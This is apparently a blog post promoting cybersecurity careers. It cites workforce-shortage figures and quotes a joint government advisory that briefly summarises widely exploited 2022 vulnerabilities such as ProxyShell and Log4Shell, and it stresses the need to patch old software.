Old software continues to be a problem. You’ve probably heard that keeping your software up to date (software hygiene) is a core software security practice.
The cybersecurity market needs you, if you are looking at a career change or just left the military, they need you!
When I call someone a cyber security practitioner, I mean it. You never arrive in the cyber security world, you may be ahead for a minute, but the bad guys are working to leap ahead and do, all the time.
If you like being in the fight, yes, it’s predominantly digital. And I mean all the time, it’s a great career with many options for new entrants to the workforce and older one’s alike.
There are many options for paid training, government assisted training, and of course, classes at your local community colleges and universities.
Massive Talent Shortage
3.4 million world wide
750,000 in the US
A 35% increase over last year
This is from a SANS blog by Lance Spitzner
Many people think cybersecurity is all about hacking into or breaking things, but cybersecurity is really learning about and helping protect how both technology and people work. The key to your success is not a technical background, but your willingness and desire to learn how technology works and to never stop playing. In addition, there are a growing number of fields in cybersecurity that do not focus on solving technical problems, but instead on human problems. These require softer skills, such as policy development, security awareness, and training, governance, security communications, privacy or cyber law, and ethics.
See the following for what keeps people in the cyber security space busy. I’ve shortened the list considerably. This is just some of what Cyber Security practitioners deal with.
The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA): United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
Canada: Canadian Centre for Cyber Security (CCCS)
New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
United Kingdom: National Cyber Security Centre (NCSC-UK)
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
CVE-2021- 44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.